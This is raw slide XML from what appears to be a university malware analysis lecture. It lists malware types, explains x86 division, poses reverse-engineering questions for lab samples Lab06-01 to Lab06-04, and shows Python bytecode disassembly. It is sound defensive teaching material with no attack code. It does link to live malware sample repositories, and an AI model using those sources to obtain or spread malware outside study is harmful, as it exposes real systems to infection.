                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="890" name="Google Shape;890;p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9" name="Google Shape;899;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5" name="Google Shape;905;p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6" name="Google Shape;906;p9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6" name="Google Shape;916;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When performing the div or idiv instruction, you are dividing edx:eax by the operand</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>and storing the result in eax and the remainder in edx.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cdq =&gt; edx:eax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="917" name="Google Shape;917;p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5" name="Google Shape;925;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6" name="Google Shape;926;p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4" name="Google Shape;934;p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5" name="Google Shape;935;p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4" name="Google Shape;944;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5" name="Google Shape;955;p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6" name="Google Shape;956;p9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8" name="Google Shape;968;p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9" name="Google Shape;969;p9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6" name="Google Shape;986;p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Lab06-01.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is the major code construct found in </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>()?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is the subroutine located at 0x40105F?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is the purpose of the program?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lab06-02.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What does 1</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en-GB"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> subroutine called by </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>() do?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is the subroutine located at 0x40117F?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What does 2</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en-GB"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> subroutine called by </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>() do?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is network-based indicators?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What the purpose of the program?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lab06-03.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is the function called by </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>()? parameters used? Code construct? purpose</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What are host-based indicators?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is the purpose of the program</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lab06-04.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is different called by main() compared to Lab06-03? New code construct added to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>()?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>How long will this program run?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What are network-based indicators?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is the purpose of the program?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="987" name="Google Shape;987;p9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3" name="Google Shape;993;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9" name="Google Shape;999;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5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5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5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5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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="274638"/>
            <a:ext cx="8784976"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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2309018" y="-601315"/>
            <a:ext cx="4525963" cy="8928992"/>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6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6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69"/>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69"/>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6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6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60"/>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60"/>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lvl1pPr indent="-419100" lvl="0" marL="457200" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3000"/>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6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6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6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6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6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6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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="274638"/>
            <a:ext cx="8784976"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6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6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6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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="274638"/>
            <a:ext cx="8784976"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6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6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6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6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6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6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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="274638"/>
            <a:ext cx="8784976"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6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6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6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6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6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6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6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16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16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6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6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6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67"/>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rm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6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6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6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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="274638"/>
            <a:ext cx="8784976"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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="1600200"/>
            <a:ext cx="8928992"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5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5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3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6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37.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4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4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4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4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5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4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4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59.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5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6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5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4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5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48.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4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4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52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.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55.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.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4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4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60.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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6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22.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://scholar.google.com.vn/citations?hl=en&amp;user=zC4vaRAAAAAJ"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scholar.google.com.vn/citations?hl=en&amp;user=zC4vaRAAAAAJ" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.jpg"/><Relationship Id="rId5"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oc.gtisc.gatech.edu/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://virusshare.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.virusign.com/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thezoo.morirt.co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docs.microsoft.com/en-us/previous-versions/ms809762(v=msdn.10)" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/quangngoc430/PeFile-View"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1.pn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www.fireeye.com/services/freeware/apatedns.html" TargetMode="Externa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hyperlink" Target="http://www.inetsim.org/" TargetMode="External"/><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39.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.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3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3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2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3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EFD1"/>
            </a:gs>
            <a:gs pos="64999">
              <a:srgbClr val="F0EBD5"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="D1C39F"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="88" name="Shape 88"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;p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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p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rPr lang="en-GB">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>Dr. Tran The Son</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>Vietnam – Korea University</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial Narrow"/>
              <a:ea typeface="Arial Narrow"/>
              <a:cs typeface="Arial Narrow"/>
              <a:sym typeface="Arial Narro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0"/>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Types of Malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Google Shape;159;p10"/>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Virus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Worm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Backdoor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Rootkit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ransomware (Crypto-ransomware)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Malicious Mobile Code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Spyware/Adware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Etc. DDoS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00"/>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Recognizing Python structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1012" name="Google Shape;1012;p100"/>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Operation +, -, ++, --, %</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1013" name="Google Shape;1013;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="2204864"/>
            <a:ext cx="1944216" cy="341632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def main():</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 = 0</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b = 1</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 = a + 11</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 = a - b</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a-=1</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b+=1</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c=a*b</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c=a/b</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b = a % 3</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main()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1014" name="Google Shape;1014;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3116515" y="1730566"/>
            <a:ext cx="2781211" cy="4893647"/>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1           0 LOAD_CONST               0 </a:t>
            </a:r>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2 LOAD_CONST               1 ('main')</a:t>
            </a:r>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4 MAKE_FUNCTION            0</a:t>
            </a:r>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6 STORE_NAME               0 (main)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="12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12           8 LOAD_NAME                0 (main)</a:t>
            </a:r>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10 CALL_FUNCTION            0</a:t>
            </a:r>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12 POP_TOP</a:t>
            </a:r>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14 LOAD_CONST               2 (None)</a:t>
            </a:r>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16 RETURN_VALUE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="12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2           0 LOAD_CONST               1 (0)</a:t>
            </a:r>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2 STORE_FAST               0 (a)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="12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3           4 LOAD_CONST               2 (1)</a:t>
            </a:r>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6 STORE_FAST               1 (b)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="12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4           8 LOAD_FAST                0 (a)</a:t>
            </a:r>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10 LOAD_CONST               3 (11)</a:t>
            </a:r>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12 BINARY_ADD</a:t>
            </a:r>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14 STORE_FAST               0 (a)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="12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5          16 LOAD_FAST                0 (a)</a:t>
            </a:r>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18 LOAD_FAST                1 (b)</a:t>
            </a:r>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20 BINARY_SUBTRACT</a:t>
            </a:r>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22 STORE_FAST               0 (a)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial Narrow"/>
              <a:ea typeface="Arial Narrow"/>
              <a:cs typeface="Arial Narrow"/>
              <a:sym typeface="Arial Narrow"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1015" name="Google Shape;1015;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156176" y="1362114"/>
            <a:ext cx="2759602" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="00206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2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6          24 LOAD_FAST                0 (a)</a:t>
            </a:r>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26 LOAD_CONST               2 (1)</a:t>
            </a:r>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28 INPLACE_SUBTRACT</a:t>
            </a:r>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30 STORE_FAST               0 (a)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="12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7          32 LOAD_FAST                1 (b)</a:t>
            </a:r>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34 LOAD_CONST               2 (1)</a:t>
            </a:r>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36 INPLACE_ADD</a:t>
            </a:r>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38 STORE_FAST               1 (b)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="12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8          40 LOAD_FAST                0 (a)</a:t>
            </a:r>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42 LOAD_FAST                1 (b)</a:t>
            </a:r>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44 BINARY_MULTIPLY</a:t>
            </a:r>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46 STORE_FAST               2 (c)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
